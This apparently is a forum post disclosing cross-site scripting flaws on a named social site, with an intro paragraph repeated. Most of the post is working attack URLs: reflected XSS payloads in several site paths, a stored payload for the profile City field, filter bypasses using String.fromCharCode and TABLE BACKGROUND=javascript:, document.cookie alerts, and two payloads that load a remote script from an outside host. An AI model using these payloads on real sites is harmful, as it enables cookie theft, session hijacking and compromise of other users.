XSS vuln with cookie disclosure via "City" input box on profile:
Data isnt properly sanatized before being generated. In one part of the site its output as full code on the screen (tested using <img> tags, with <table> tags, no
code displays), and on the other part, an XSS can occur:
For a PoC, since they add backslashes to ' and ", use the long UTF-8 Unicode for ':
Homepage:
http://www.bingbox.com
Affected files:
* Profile input boxes:
- City input
* Registering
* Viewing Birthdays
* Adding a friend
* Viewing people online
-----------------------------------------------
XSS with cookie disclosure via inviting friends:
http://www.bingbox.com/go/admin/f=friends&o=invite&a=msn&t=web&wizard=st
art">">">">">'>'>'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>
<"<
"<"<'<'<'
XSS vuln with cookie disclosure via "City" input box on profile:
Data isnt properly sanatized before being generated. In one part of the site its output as full code on the screen (tested using <img> tags, with <table> tags, no
code displays), and on the other part, an XSS can occur:
For a PoC, since they add backslashes to ' and ", use the long UTF-8 Unicode for ':
<TABLE BACKGROUND=javascript:alert('XSS')>
For the cookie:
<TABLE BACKGROUND=javascript:alert(document.cookie)>
--------------------------------------------------
XSS with cookie disclosure when viewing a blog, that redirects you to the register page:
http://bingbox.com/go/register/wanted=luny666/">">">">">">'>'><SCRIPT%20
SRC=http://youfucktard.com/xss.js></SCRIPT><"<"<'<'<"<"
-----------------------------------------------
XSS via viewing birthdays:
http://www.bingbox.com/go/birthdays/month=8&day=13">'>'>'>"><"">">">"><I
MG%20SRC=javascript:alert(String.fromCharCode(88,83,83))><"<"<"<"<'<'<'<
"<""><
"<"
-------------------------------------------------
XSS when adding a new friend. Same as above, we arent able to use ' or long UTF-8 unicode above, so we use fromCharCode's. PoC:
http://www.bingbox.com/go/admin/f=friends&o=new&friendname=DreamUnik">'>
'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83
))
><"<"<"<"<'<'<'<"<""><"<"
--------------------------------------------------
XSS vuln when viewing people online:
http://www.bingbox.com/go/whoisonline/i=1&agemin=&agemax=&country=US">'>
'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83
))
><"<"<"<"<'<'<'<"<""><"<"&locationarea=&sex=&page=3
------------------------------------------------
More XSS vulns:
http://www.bingbox.com/go/static/file=av">'>'>'>"><"">">">"><IMG%20SRC=j
avascript:alert(String.fromCharCode(88,83,83))><"<"<"<"<'<'<'<"<""><
http://www.bingbox.com/go/static/file=ps">'>'>'>"><"">">">"><IMG%20SRC=j
avascript:alert(String.fromCharCode(88,83,83))><"<"<"<"<'<'<'<"<""><
http://www.bingbox.com/go/static/file=gedragscode">'>'>'>"><"">">">"><IM
G%20SRC=javascript:alert(String.fromCharCode(88,83,83))><"<"<"<"<'<'<'<"
<""><
Screenshots:
http://www.youfucktard.com/xsp/bingbox1.jpg
http://www.youfucktard.com/xsp/bingbox2.jpg
http://www.youfucktard.com/xsp/bingbox3.jpg
http://www.youfucktard.com/xsp/bingbox4.jpg
http://www.youfucktard.com/xsp/bingbox5.jpg
http://www.youfucktard.com/xsp/bingbox6.jpg
http://www.youfucktard.com/xsp/bingbox7.jpg
http://www.youfucktard.com/xsp/bingbox8.jpg
[ reply ]